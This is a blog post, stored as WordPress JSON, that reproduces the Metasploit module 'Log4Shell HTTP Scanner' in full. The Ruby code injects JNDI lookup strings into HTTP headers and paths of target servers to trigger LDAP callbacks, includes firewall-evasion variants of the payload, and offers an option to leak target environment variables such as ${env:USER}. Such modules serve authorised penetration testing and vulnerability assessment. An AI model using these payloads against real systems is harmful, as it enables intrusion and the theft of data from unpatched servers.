{"id":59358,"date":"2024-09-01T20:29:46","date_gmt":"2024-09-01T17:29:46","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181171\/log4shell_scanner.rb.txt"},"modified":"2024-09-01T20:29:46","modified_gmt":"2024-09-01T17:29:46","slug":"log4shell-http-scanner","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/log4shell-http-scanner\/","title":{"rendered":"Log4Shell HTTP Scanner"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary<\/p>\n

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Log4Shell
include Msf::Auxiliary::Scanner<\/p>\n

def initialize
super(
‘Name’ => ‘Log4Shell HTTP Scanner’,
‘Description’ => %q{
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.<\/p>\n

This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
HTTP headers and the HTTP request path.<\/p>\n

Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid,
Apache JSPWiki, Apache OFBiz.
},
‘Author’ => [
‘Spencer McIntyre’, # The fun stuff
‘RageLtMan <rageltman[at]sempervictus>’, # Some plumbing
],
‘References’ => [
[ ‘CVE’, ‘2021-44228’ ],
[ ‘CVE’, ‘2021-45046’ ],
[ ‘URL’, ‘https:\/\/attackerkb.com\/topics\/in9sPR2Bzt\/cve-2021-44228-log4shell\/rapid7-analysis’ ],
[ ‘URL’, ‘https:\/\/logging.apache.org\/log4j\/2.x\/security.html’ ]],
‘DisclosureDate’ => ‘2021-12-09’,
‘License’ => MSF_LICENSE,
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘SideEffects’ => [IOC_IN_LOGS],
‘AKA’ => [‘Log4Shell’, ‘LogJam’],
‘Reliability’ => []}
)<\/p>\n

register_options([
OptString.new(‘HTTP_METHOD’, [ true, ‘The HTTP method to use’, ‘GET’ ]),
OptString.new(‘TARGETURI’, [ true, ‘The URI to scan’, ‘\/’]),
OptString.new(‘LEAK_PARAMS’, [ false, ‘Additional parameters to leak, separated by the ^ character (e.g., ${env:USER}^${env:PATH})’]),
OptPath.new(
‘HEADERS_FILE’,
[
false,
‘File containing headers to check’,
File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2021-44228’, ‘http_headers.txt’)
]),
OptPath.new(
‘URIS_FILE’,
[
false,
‘File containing additional URIs to check’,
File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2021-44228’, ‘http_uris.txt’)
]),
OptInt.new(‘LDAP_TIMEOUT’, [ true, ‘Time in seconds to wait to receive LDAP connections’, 30 ])
])
end<\/p>\n

def log4j_jndi_string(resource = ”)
resource = resource.dup
resource << ‘\/${java:os}\/${sys:java.vendor}_${sys:java.version}’
# We should add obfuscation to the URL string to scan through lousy “next-gen” firewalls
unless datastore[‘LEAK_PARAMS’].blank?
resource << ‘\/’
resource << datastore[‘LEAK_PARAMS’]end
super(resource)
end<\/p>\n

#
# Handle incoming requests via service mixin
#
def build_ldap_search_response(msg_id, base_dn)
token, java_os, java_version, uri_parts = base_dn.split(‘\/’, 4)
target_info = @mutex.synchronize { @tokens.delete(token) }
if target_info
@mutex.synchronize { @successes << target_info }
details = normalize_uri(target_info[:target_uri]).to_s
details << ” (header: #{target_info[:headers].keys.first})” unless target_info[:headers].nil?
details << ” (os: #{java_os})” unless java_os.blank?
details << ” (java: #{java_version})” unless java_version.blank?
unless uri_parts.blank?
uri_parts = uri_parts.split(‘^’)
leaked = ”
datastore[‘LEAK_PARAMS’].split(‘^’).each_with_index do |input, idx|
next if input == uri_parts[idx]\n

leaked << “#{input}=#{uri_parts[idx]} “
end
unless leaked.blank?
details << ” (leaked: #{leaked.rstrip})”
vprint_good(“Leaked data: #{leaked.rstrip}”)
end
end
peerinfo = “#{target_info[:rhost]}:#{target_info[:rport]}”
print_good(“#{peerinfo.ljust(21)} – Log4Shell found via #{details}”)
report_vuln(
host: target_info[:rhost],
port: target_info[:rport],
info: “Module #{fullname} detected Log4Shell vulnerability via #{details}”,
name: name,
refs: references
)
end<\/p>\n

attrs = [ ]appseq = [
base_dn.to_ber,
attrs.to_ber_sequence
].to_ber_appsequence(Net::LDAP::PDU::SearchReturnedData)
[ msg_id.to_ber, appseq ].to_ber_sequence
end<\/p>\n

def rand_text_alpha_lower_numeric(len, bad = ”)
foo = []foo += (‘a’..’z’).to_a
foo += (‘0’..’9′).to_a
Rex::Text.rand_base(len, bad, *foo)
end<\/p>\n

def run
validate_configuration!
@mutex = Mutex.new
@mutex.extend(::Rex::Ref)<\/p>\n

@tokens = {}
@tokens.extend(::Rex::Ref)<\/p>\n

@successes = []@successes.extend(::Rex::Ref)<\/p>\n

begin
start_service
rescue Rex::BindFailed => e
fail_with(Failure::BadConfig, e.to_s)
end<\/p>\n

super<\/p>\n

print_status(“Sleeping #{datastore[‘LDAP_TIMEOUT’]} seconds for any last LDAP connections”)
sleep datastore[‘LDAP_TIMEOUT’]\n

if @successes.empty?
return Exploit::CheckCode::Unknown
end<\/p>\n

Exploit::CheckCode::Vulnerable(details: @successes)
end<\/p>\n

def run_host(ip)
# probe the target before continuing
return if send_request_cgi(‘uri’ => normalize_uri(target_uri)).nil?<\/p>\n

run_host_uri(ip, normalize_uri(target_uri)) unless target_uri.blank?<\/p>\n

return if datastore[‘URIS_FILE’].blank?<\/p>\n

File.open(datastore[‘URIS_FILE’], ‘rb’).each_line(chomp: true) do |uri|
next if uri.blank? || uri.start_with?(‘#’)<\/p>\n

if uri.include?(‘${jndi:uri}’)
token = rand_text_alpha_lower_numeric(8..32)
jndi = log4j_jndi_string(token)
uri.delete_prefix!(‘\/’)
test(token, uri: normalize_uri(target_uri, ”) + uri.gsub(‘${jndi:uri}’, Rex::Text.uri_encode(jndi)))
else
run_host_uri(ip, normalize_uri(target_uri, uri))
end
end
end<\/p>\n

def run_host_uri(_ip, uri)
# HTTP_HEADER isn’t exposed via the datastore but allows other modules to leverage this one to test a specific value
unless datastore[‘HTTP_HEADER’].blank?
token = rand_text_alpha_lower_numeric(8..32)
test(token, uri: uri, headers: { datastore[‘HTTP_HEADER’] => log4j_jndi_string(token) })
end<\/p>\n

unless datastore[‘HEADERS_FILE’].blank?
headers_file = File.open(datastore[‘HEADERS_FILE’], ‘rb’)
headers_file.each_line(chomp: true) do |header|
next if header.blank? || header.start_with?(‘#’)<\/p>\n

token = rand_text_alpha_lower_numeric(8..32)
test(token, uri: uri, headers: { header => log4j_jndi_string(token) })
end
end<\/p>\n

token = rand_text_alpha_lower_numeric(8..32)
jndi = log4j_jndi_string(token)
test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub(‘ldap:\/\/’, ‘ldap:${::-\/}\/’)), ‘\/’))<\/p>\n

token = rand_text_alpha_lower_numeric(8..32)
jndi = log4j_jndi_string(token)
test(token, uri: normalize_uri(uri, Rex::Text.uri_encode(jndi.gsub(‘ldap:\/\/’, ‘ldap:${::-\/}\/’))))
end<\/p>\n

def test(token, uri: nil, headers: nil)
target_info = {
rhost: rhost,
rport: rport,
target_uri: uri,
headers: headers
}
@mutex.synchronize { @tokens[token] = target_info }<\/p>\n

send_request_raw(
‘uri’ => uri,
‘method’ => datastore[‘HTTP_METHOD’],
‘headers’ => headers
)
end<\/p>\n

attr_accessor :mutex, :tokens, :successes
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClientinclude Msf::Exploit::Remote::Log4Shellinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘Log4Shell HTTP Scanner’,‘Description’ => %q{Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59358","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59358","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59358"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59358\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59358"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59358"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}